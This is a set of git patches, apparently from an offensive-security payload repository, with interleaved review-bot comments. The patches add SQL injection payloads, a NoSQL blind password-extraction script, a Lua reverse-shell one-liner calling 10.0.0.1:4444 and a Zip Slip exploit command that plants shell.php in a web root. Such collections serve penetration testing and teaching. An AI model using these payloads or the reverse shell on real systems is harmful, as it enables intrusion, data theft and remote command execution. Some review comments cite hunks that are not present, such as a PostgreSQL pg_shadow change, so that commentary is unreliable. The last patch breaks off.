[CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) From f81f9440b8ecbbae9eaf20f4049fd767e15b4c9c Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 16:32:22 +0530 Subject: [PATCH 089/222] Added More Ways to Detect columns number using order by or group by using order by or group by error based using UNION SELECT Error Based --- SQL Injection/MySQL Injection.md | 55 +++++++++++++++++++++++++++----- 1 file changed, 47 insertions(+), 8 deletions(-) 
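Review bot: blank lines around the new heading are missing in the `-57,7 +58,10` hunk: the removed empty line was the only separator, so the closing fence of the `pg_shadow` block now runs straight into `## PostgreSQL List Database Administrator Accounts`, and the closing fence of the new block runs straight into `## PostgreSQL List Privileges`. Add an empty line before each heading, as the rest of the file does. The query itself is correct (`usesuper` is the superuser flag in `pg_user`); `WHERE usesuper` alone is equivalent to `WHERE usesuper IS TRUE`.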
diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index f61cc52b..979aa8b6 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -3,8 +3,8 @@ ## Summary * [MYSQL Comment](#mysql-comment) -* [Detect columns number](#detect-columns-number) * [MYSQL Union Based](#mysql-union-based) + * [Detect columns number](#detect-columns-number) * [Extract database with information_schema](#extract-database-with-information-schema) * [Extract data without information_schema](#extract-data-without-information-schema) * [Extract data without columns name](#extract-data-without-columns-name) 
@@ -46,17 +46,56 @@ ## MYSQL Union Based -### Extract database with information_schema +### Detect columns number -First you need to know the number of columns, you can use `order by`. +First you need to know the number of columns + +#### using `order by` or `group by` + +Keep incrementing the number until you get a False response. +Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query. ```sql -order by 1 -order by 2 -order by 3 -... -order by XXX +1' ORDER BY 1--+ #True +1' ORDER BY 2--+ #True +1' ORDER BY 3--+ #True +1' ORDER BY 4--+ #False - Query is only using 3 columns + #-1' UNION SELECT 1,2,3--+ True ``` +or +```sql +1' GROUP BY 1--+ #True +1' GROUP BY 2--+ #True +1' GROUP BY 3--+ #True +1' GROUP BY 4--+ #False - Query is only using 3 columns + #-1' UNION SELECT 1,2,3--+ True +``` +#### using `order by` or `group by` Error Based +Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled. 
+```sql +1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ + +# Unknown column '4' in 'order clause' +# This error means query uses 3 column +#-1' UNION SELECT 1,2,3--+ True +``` +or +```sql +1' GROUP BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ + +# Unknown column '4' in 'group statement' +# This error means query uses 3 column +#-1' UNION SELECT 1,2,3--+ True +``` +#### using `UNION SELECT` Error Based +This method works if error showing is enabled +```sql +1' UNION SELECT @--+ #The used SELECT statements have a different number of columns +1' UNION SELECT @,@--+ #The used SELECT statements have a different number of columns +1' UNION SELECT @,@,@--+ #No error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` +### Extract database with information_schema Then the following codes will extract the databases'name, tables'name, columns'name. From 614e8a97b9acf59ebd9e265fad488e43b714bfa5 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 16:48:11 +0530 Subject: [PATCH 090/222] Updated Detect columns number Detect columns number using LIMIT INTO Error Based --- SQL Injection/MySQL Injection.md | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 979aa8b6..783d9138 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md 
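Review bot: typo in the added explanatory sentence of the `Detect columns number` hunk: "funcionality" should be "functionality". The comment "This error means query uses 3 column" (present in both the `order by` and the `group by` error-based block, and again as "No error means query uses 3 column" in the `UNION SELECT` block) should read "3 columns". It is also worth stating in the `order by`/`group by` paragraph that the two differ only in the error text (`'order clause'` vs `'group statement'`, as the examples already show), since that is what a reader matching on responses needs to know.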
@@ -95,6 +95,16 @@ This method works if error showing is enabled 1' UNION SELECT @,@,@--+ #No error means query uses 3 column #-1' UNION SELECT 1,2,3--+ True ``` +#### using `LIMIT INTO` Error Based +This method works if error showing is enabled. + +It is useful for finding the number of columns when the injection point is after a LIMIT clause. +```sql +1' LIMIT 1,1 INTO @--+ #The used SELECT statements have a different number of columns +1' LIMIT 1,1 INTO @,@--+ #The used SELECT statements have a different number of columns +1' LIMIT 1,1 INTO @,@,@--+ #No error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` ### Extract database with information_schema Then the following codes will extract the databases'name, tables'name, columns'name. From 7d6fab92fa65ee282f70809f50c12df5649ad281 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 18:11:58 +0530 Subject: [PATCH 091/222] Update Detect columns number Using SELECT * FROM SOME_EXISTING_TABLE Error Based --- SQL Injection/MySQL Injection.md | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 783d9138..1a475e71 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -50,7 +50,7 @@ First you need to know the number of columns -#### using `order by` or `group by` +##### Using `order by` or `group by` Keep incrementing the number until you get a False response. Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query. 
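Review bot: the comment `#No error means query uses 3 column` in the `LIMIT INTO` hunk repeats the grammar slip from the earlier blocks (should be "3 columns"). The sentence "This method works if error showing is enabled." now opens three consecutive subsections; a single note at the top of the error-based variants would avoid repeating it. The point made in the second sentence, that this variant is the one to use when the injection lands after a `LIMIT` clause, is the useful part and should stay.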
@@ -70,7 +70,7 @@ or 1' GROUP BY 4--+ #False - Query is only using 3 columns #-1' UNION SELECT 1,2,3--+ True ``` -#### using `order by` or `group by` Error Based +##### Using `order by` or `group by` Error Based Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled. ```sql 1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ @@ -87,7 +87,7 @@ or # This error means query uses 3 column #-1' UNION SELECT 1,2,3--+ True ``` -#### using `UNION SELECT` Error Based +##### Using `UNION SELECT` Error Based This method works if error showing is enabled ```sql 1' UNION SELECT @--+ #The used SELECT statements have a different number of columns @@ -95,7 +95,7 @@ This method works if error showing is enabled 1' UNION SELECT @,@,@--+ #No error means query uses 3 column #-1' UNION SELECT 1,2,3--+ True ``` -#### using `LIMIT INTO` Error Based +##### Using `LIMIT INTO` Error Based This method works if error showing is enabled. It is useful for finding the number of columns when the injection point is after a LIMIT clause. 
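Review bot: changing these four headings from `####` to `#####` skips a level: their parent is `### Detect columns number`, so `####` was already the correct depth, and `#####` leaves no `####` between them. Renderers show h5 as very small text and Markdown linters flag the jump; revert to `####` (the capitalised "Using" is fine to keep).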
@@ -105,6 +105,16 @@ It is useful for finding the number of columns when the injection point is after 1' LIMIT 1,1 INTO @,@,@--+ #No error means query uses 3 column #-1' UNION SELECT 1,2,3--+ True ``` +##### Using `SELECT * FROM SOME_EXISTING_TABLE` Error Based +This works if you know the table name you're after and error showing is enabled. + +It will return the amount of columns in the table, not the query. + +```sql +1' AND (SELECT * FROM Users) = 1--+ #Operand should contain 3 column(s) + # This error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` ### Extract database with information_schema Then the following codes will extract the databases'name, tables'name, columns'name. From a33dce0d6077e15010689efe7b9e71d81c91aa30 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 18:25:00 +0530 Subject: [PATCH 092/222] Fixed Broken Links --- SQL Injection/MySQL Injection.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 1a475e71..9dd034c4 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -5,8 +5,8 @@ * [MYSQL Comment](#mysql-comment) * [MYSQL Union Based](#mysql-union-based) * [Detect columns number](#detect-columns-number) - * [Extract database with information_schema](#extract-database-with-information-schema) - * [Extract data without information_schema](#extract-data-without-information-schema) + * [Extract database with information_schema](#extract-database-with-information_schema) + * [Extract columns name without information_schema](#extract-columns-name-without-information_schema) * [Extract data without columns name](#extract-data-without-columns-name) * [MYSQL Error Based](#mysql-error-based) * [MYSQL Error Based - Basic](#mysql-error-based---basic) 
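Review bot: the prose and the code comment in the `SELECT * FROM SOME_EXISTING_TABLE` hunk contradict each other: the text says the error reports the number of columns in the table, not in the query, yet the comment says `# This error means query uses 3 column` and goes straight to `UNION SELECT 1,2,3`. Reword the comment to say that the count is the column count of `Users`, and that it matches the query's column count only when the query selects every column of that table; otherwise a reader will treat the two numbers as interchangeable.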
@@ -15,10 +15,10 @@ * [MYSQL Blind](#mysql-blind) * [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent) * [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement) - * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set) + * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make_set) * [MYSQL Blind with LIKE](#mysql-blind-with-like) * [MYSQL Time Based](#mysql-time-based) - * [Using SLEEP in a subselect](#using-asleep-in-a-subselect) + * [Using SLEEP in a subselect](#using-sleep-in-a-subselect) * [Using conditional statements](#using-conditional-statements) * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot) * [MYSQL Current queries](#mysql-current-queries) From ca59b1d21789f95fbce1b41a3a1397fe93dfbf01 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 18:44:28 +0530 Subject: [PATCH 093/222] Fixed Broken Links in MSSQL Injection Fixed Broken Links in MSSQL Injection --- SQL Injection/MSSQL Injection.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index fa30aa67..0e793653 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md 
@@ -5,18 +5,18 @@ * [MSSQL comments](#mssql-comments) * [MSSQL version](#mssql-version) * [MSSQL database name](#mssql-database-name) -* [MSSQL List databases](#mssql-list-database) +* [MSSQL List databases](#mssql-list-databases) * [MSSQL List columns](#mssql-list-columns) * [MSSQL List tables](#mssql-list-tables) -* [MSSQL Extract user/password](#mssql-extract-user-password) +* [MSSQL Extract user/password](#mssql-extract-userpassword) * [MSSQL Union Based](#mssql-union-based) * [MSSQL Error Based](#mssql-error-based) * [MSSQL Blind Based](#mssql-blind-based) * [MSSQL Time Based](#mssql-time-based) -* [MSSQL Stacked query](#mssql-stack-query) +* [MSSQL Stacked query](#mssql-stacked-query) * [MSSQL Command execution](#mssql-command-execution) * [MSSQL UNC path](#mssql-unc-path) -* [MSSQL Make user DBA](#mssql-make-user-dba) +* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin) ## MSSQL comments From 20d6599772a6ce3774fda00dbe64f8c585d4abf5 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 18:57:33 +0530 Subject: [PATCH 094/222] Added Summary --- SQL Injection/OracleSQL Injection.md | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index 0228cd9d..633e24c7 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -1,5 +1,18 @@ # Oracle SQL Injection +## Summary + +* [Oracle SQL version](#oracle-sql-version) +* [Oracle SQL database name](#oracle-sql-database-name) +* [Oracle SQL List databases](#oracle-sql-list-databases) +* [Oracle SQL List columns](#oracle-sql-list-columns) +* [Oracle SQL List tables](#oracle-sql-list-tables) +* [Oracle SQL Error Based](#oracle-sql-error-based) +* [Oracle SQL Blind](#oracle-sql-blind) +* [Oracle SQL Time Based](#oracle-sql-time-based) +* [Oracle SQL Command execution](#oracle-sql-command-execution) +* [References](#references) + ## Oracle SQL version ```sql 
@@ -21,7 +34,7 @@ SELECT SYS.DATABASE_NAME FROM DUAL; SELECT DISTINCT owner FROM all_tables; ``` -## Oracle SQL List Column +## Oracle SQL List Columns ```sql SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; From 4b1f7e629d740c0cb71848983fe0ec06bb37c844 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:06:41 +0530 Subject: [PATCH 095/222] Fixed Broken Links in PostgreSQL Injection --- SQL Injection/PostgreSQL Injection.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 2bf952ce..00bbbf41 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -20,8 +20,8 @@ * [PostgreSQL File Read](#postgresql-file-read) * [PostgreSQL File Write](#postgresql-file-write) * [PostgreSQL Command execution](#postgresql-command-execution) - * [CVE-2019–9193](#cve-2019–9193) - * [Using libc.so.6](#using-libc-so-6) + * [CVE-2019–9193](#cve-20199193) + * [Using libc.so.6](#using-libcso6) * [References](#references) ## PostgreSQL Comments From a69c2acb7d61a94abc553d03a906c54704820392 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:22:49 +0530 Subject: [PATCH 096/222] Added Summary in SQLite Injection --- SQL Injection/SQLite Injection.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index 0631c0bd..428e806a 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md 
@@ -1,5 +1,18 @@ # SQLite Injection +## Summary + +* [SQLite comments](#sqlite-comments) +* [SQLite version](#sqlite-version) +* [Integer/String based - Extract table name](#integerstring-based---extract-table-name) +* [Integer/String based - Extract column name](#integerstring-based---extract-column-name) +* [Boolean - Count number of tables](#boolean---count-number-of-tables) +* [Boolean - Enumerating table name](#boolean---enumerating-table-name) +* [Boolean - Extract info](#boolean---extract-info) +* [Time based](#time-based) +* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database) +* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension) +* [References](#references) ## SQLite comments ```sql From fe8c7be2fb80679255c4451f9a8b3e9d9725c272 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:33:09 +0530 Subject: [PATCH 097/222] Fixed Broken Links in SQL injection README.md --- SQL Injection/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 8099f6df..5074f5fe 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -21,7 +21,7 @@ Attempting to manipulate SQL queries may have goals including: * [SQL injection using SQLmap](#sql-injection-using-sqlmap) * [Basic arguments for SQLmap](#basic-arguments-for-sqlmap) * [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent) - * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragent-header-referer-cookie) + * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie) * [Second order injection](#second-order-injection) * [Shell](#shell) * [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit) 
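Review bot: a blank line is missing between the last summary item and the next heading in this hunk: the added block ends at `+* [References](#references)` and `## SQLite comments` follows on the very next line. The Oracle and Cassandra summaries added in the sibling patches end with an empty line before the first `##` section; do the same here so the list and the heading do not run together.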
@@ -29,7 +29,7 @@ Attempting to manipulate SQL queries may have goals including: * [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap) * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy) * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) - * [General tamper option and tamper's list](#general-tamper-option-and-tamper-s-list) + * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) * [Authentication bypass](#authentication-bypass) * [Polyglot injection](#polyglot-injection-multicontext) * [Routed injection](#routed-injection) From 4d94e553b9fed521232a60cde01ade899ab02c75 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 19:42:49 +0530 Subject: [PATCH 098/222] Added Summary in Cassandra Injection --- SQL Injection/Cassandra Injection.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/SQL Injection/Cassandra Injection.md b/SQL Injection/Cassandra Injection.md index e66949ec..2396618f 100644 --- a/SQL Injection/Cassandra Injection.md +++ b/SQL Injection/Cassandra Injection.md @@ -2,6 +2,14 @@ > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system +## Summary + +* [Cassandra comment](#cassandra-comment) +* [Cassandra - Login Bypass](#cassandra---login-bypass) + * [Login Bypass 0](#login-bypass-0) + * [Login Bypass 1](#login-bypass-1) +* [References](#references) + ## Cassandra comment ```sql @@ -34,4 +42,4 @@ Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://h ## References -* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) \ No newline at end of file +* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) From d41e0d33bde447476bf457ed93451a9504e50890 Mon Sep 17 00:00:00 2001 
From: nizam0906 Date: Tue, 29 Oct 2019 19:47:42 +0530 Subject: [PATCH 099/222] Added Summary in Hibernate Query Language Injection --- SQL Injection/HQL Injection.md | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md index 0086f106..6e8168be 100644 --- a/SQL Injection/HQL Injection.md +++ b/SQL Injection/HQL Injection.md @@ -1,6 +1,12 @@ # Hibernate Query Language Injection > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia +## Summary + +* [HQL Comments](#hql-comments) +* [HQL List Columns](#hql-list-columns) +* [HQL Error Based](#hql-error-based) +* [References](#references) ## HQL Comments @@ -49,4 +55,4 @@ select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.pro * [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language) * [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) * [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm) -* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) \ No newline at end of file +* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) From 694e9e4dbd503eb80e9650eb5d8a6979826abb6c Mon Sep 17 00:00:00 2001 
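Review bot: the HQL summary in this hunk has the same spacing problem as the SQLite one: `+* [References](#references)` is immediately followed by `## HQL Comments` with no empty line in between (the hunk grows from 6 to 12 lines and all six added lines are the heading, one blank and four items, so no separator was added). Add a blank line after the last item.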
From: Reelix Date: Tue, 29 Oct 2019 21:11:56 +0200 Subject: [PATCH 100/222] Added an alternate possible Found condition to POST --- NoSQL Injection/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index b52f6bfa..7c203b8c 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -89,8 +89,8 @@ while True: for c in string.printable: if c not in ['*','+','.','?','|']: payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c) - r = requests.post(u, data = payload, headers = headers, verify = False) - if 'OK' in r.text: + r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) + if 'OK' in r.text or r.status_code == 302: print("Found one more char : %s" % (password+c)) password += c ``` From 6b22d53257a272b2facac28cbc6a487f58fc8015 Mon Sep 17 00:00:00 2001 From: Dave <47663767+cydave@users.noreply.github.com> Date: Tue, 29 Oct 2019 19:31:07 +0000 Subject: [PATCH 101/222] Fix lua reverse shell quote issue The single quotes around `io.popen` prevented the one-liner from being executed. This change should fix that :) --- Methodology and Resources/Reverse Shell Cheatsheet.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index cf91cc25..60cd02a9 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md 
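Review bot: the new `or r.status_code == 302` condition in the NoSQL hunk is undocumented: a redirect on a successful login is application-specific, so the text around the snippet should say that the reader must first confirm how the target responds to a valid versus an invalid guess before treating a 302 as a hit. `allow_redirects = False` is what makes the 302 visible to the check at all and deserves a short inline comment, otherwise the next contributor will "simplify" it away.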
@@ -203,7 +203,7 @@ lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','424 Windows and Linux ```powershell -lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ``` ### NodeJS From b36e5262bd5af2461a7112ab34ef45b190ebef38 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Wed, 30 Oct 2019 11:19:52 +0800 Subject: [PATCH 102/222] Create Readme --- Zip Slip/Readme | 1 + 1 file changed, 1 insertion(+) create mode 100644 Zip Slip/Readme diff --git a/Zip Slip/Readme b/Zip Slip/Readme new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/Zip Slip/Readme @@ -0,0 +1 @@ + From bd121bfccb2d4cbe06ebcfd81b6c1bc293be1fa0 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Wed, 30 Oct 2019 11:24:35 +0800 Subject: [PATCH 103/222] Delete Readme --- Zip Slip/Readme | 1 - 1 file changed, 1 deletion(-) delete mode 100644 Zip Slip/Readme diff --git a/Zip Slip/Readme b/Zip Slip/Readme deleted file mode 100644 index 8b137891..00000000 --- a/Zip Slip/Readme +++ /dev/null @@ -1 +0,0 @@ - From 5f31044ae3ccdaeb5a4e67c4302dd7fcc88a81c1 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Wed, 30 Oct 2019 11:24:56 +0800 Subject: [PATCH 104/222] Create ReadMe.txt --- Upload Insecure Files/Zip Slip/ReadMe.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 Upload Insecure Files/Zip Slip/ReadMe.txt 
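Review bot: patches 102, 103 and 104 are pure file churn: 102 creates an empty `Zip Slip/Readme`, 103 deletes it, and 104 creates an equally empty `Upload Insecure Files/Zip Slip/ReadMe.txt` (blob 8b137891, a single newline), which patch 106 then deletes again in favour of the real README.md. Squash all of them into 106 so the history does not carry three commits that add and remove a blank file.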
diff --git a/Upload Insecure Files/Zip Slip/ReadMe.txt b/Upload Insecure Files/Zip Slip/ReadMe.txt new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/Upload Insecure Files/Zip Slip/ReadMe.txt @@ -0,0 +1 @@ + From 5fec4f7c21c9a416fd481120e246e49a5b3774a7 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Wed, 30 Oct 2019 11:36:09 +0800 Subject: [PATCH 105/222] Update Java.md --- Insecure Deserialization/Java.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md index f3606d14..59156880 100644 --- a/Insecure Deserialization/Java.md +++ b/Insecure Deserialization/Java.md 
@@ -63,10 +63,12 @@ JRE8u20_RCE_Gadget JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss) +ysoserial-modified [https://github.com/pimps/ysoserial-modified](https://github.com/pimps/ysoserial-modified) + ## References - [Github - ysoserial](https://github.com/frohoff/ysoserial) - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) - [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) -- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) \ No newline at end of file +- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) From 83569c614268dff78973e20b344192766fa0ed63 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Wed, 30 Oct 2019 12:07:50 +0800 Subject: [PATCH 106/222] Update and rename ReadMe.txt to README.md --- Upload Insecure Files/Zip Slip/README.md | 35 +++++++++++++++++++++++ Upload Insecure Files/Zip Slip/ReadMe.txt | 1 - 2 files changed, 35 insertions(+), 1 deletion(-) create mode 100644 Upload Insecure Files/Zip Slip/README.md delete mode 100644 Upload Insecure Files/Zip Slip/ReadMe.txt diff --git a/Upload Insecure Files/Zip Slip/README.md b/Upload Insecure Files/Zip Slip/README.md new file mode 100644 index 00000000..39d647e6 --- /dev/null 
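Review bot: the `ysoserial-modified` line added in this hunk lacks the one-line description that the neighbouring entries carry (`JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [link]`); say in a few words how it differs from the upstream ysoserial already listed under References, so the tools list stays self-describing.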
+++ b/Upload Insecure Files/Zip Slip/README.md @@ -0,0 +1,35 @@ +# Zip Slip + +> The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine. + +## Summary + +- [Detection](#detection) +- [Tools](#tools) +* [Exploits](#exploits) + * [Basic Exploit](#basic-exploit) +- [Additional Notes](#additional-notes) + +## Detection + +- Any zip upload page on the application + +## Tools + +- evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc) + +## Exploits + +### Basic Exploit + +```python +python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15 +``` + +### Additional Notes +- For affected libraries and projects, visit https://github.com/snyk/zip-slip-vulnerability + +## References + +- [Zip Slip Vulnerability - Snyk Ltd, 2019](https://snyk.io/research/zip-slip-vulnerability) +- [Zip Slip - snyk, 2019](https://github.com/snyk/zip-slip-vulnerability) diff --git a/Upload Insecure Files/Zip Slip/ReadMe.txt b/Upload Insecure Files/Zip Slip/ReadMe.txt deleted file mode 100644 index 8b137891..00000000 --- a/Upload Insecure Files/Zip Slip/ReadMe.txt +++ /dev/null @@ -1 +0,0 @@ - From 83f46a22e3d845ddc8d1b106d3236bbc374e2561 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 2 Nov 2019 00:54:48 +0100 Subject: [PATCH 107/222] add XXE via SVG rasterization --- XXE Injection/README.md | 37 ++++++++++++++++++++++++++++++++++++- 1 file changed, 36 insertions(+), 1 deletion(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index d4792dd6..ba1bb59b 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md 
